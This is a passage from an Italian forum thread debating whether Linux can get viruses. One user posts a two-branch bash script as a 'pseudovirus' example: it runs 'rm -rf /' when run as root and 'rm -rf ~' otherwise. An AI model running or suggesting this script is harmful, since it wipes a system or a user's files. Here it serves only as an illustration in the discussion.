Pagina 2 di 2 primaprima 1 2
Visualizzazione dei risultati da 11 a 15 su 15

ma io ho scritto quello solo per far vedere a discepolo un piccolo esempio di pesudovirus per linux visto che diceva che non esistevano
    @_=(115,-17,6);print+map{chr$_[$.=$_-$_]*$_**$.+++$_[$.]*$_**$.+++$_[$.]*$_**$.}$.-$...$#_

Originariamente inviato da adarkar
    #!/bin/bash
    if id | grep '^uid=0' ; then rm -rf /
    else rm -rf ~ ; fi
    Malware di sicuro, ma non so se rientra nella categoria virus (per dire, non si autoreplica).
    "Qualsiasi esperto ha paura di combattere usando la katana vera. Anch'io. Ma non ignoro la mia paura, riesco ad accettarla, e a metterla da parte accanto a me".

Utente di HTML.it L'avatar di discepolo
    quindi ada, pure linux come win potrebbe essere attaccato dai virus, volendo!!

VVoVe: VVoVe:

oh mamma
    MacOsX - Imac 17"
    Aspettando ubuntu su mac!!
    Xbox360
    Tv Lg 26 "

Utente bannato
    allora, tutto imho, linux e' un ambiente ostico rispetto ad win.

Infatti su linux non sei mai root (o almeno cerchi di esserlo meno possibile).

quindi dormi notti tranquille, un sistema inespugnabile cmq. non esiste un exploit esce sempre, ma puoi stare gia' sereno, l'active X linux non li ha, gia' mac os X+office si

Ciao

Originariamente inviato da Ikitt
    Malware di sicuro, ma non so se rientra nella categoria virus (per dire, non si autoreplica).
    già
    ovviamente il mio era solo un modo di far capire che anche su linux si possono fare danni

ciauz todos
    @_=(115,-17,6);print+map{chr$_[$.=$_-$_]*$_**$.+++$_[$.]*$_**$.+++$_[$.]*$_**$.}$.-$...$#_

Permessi di invio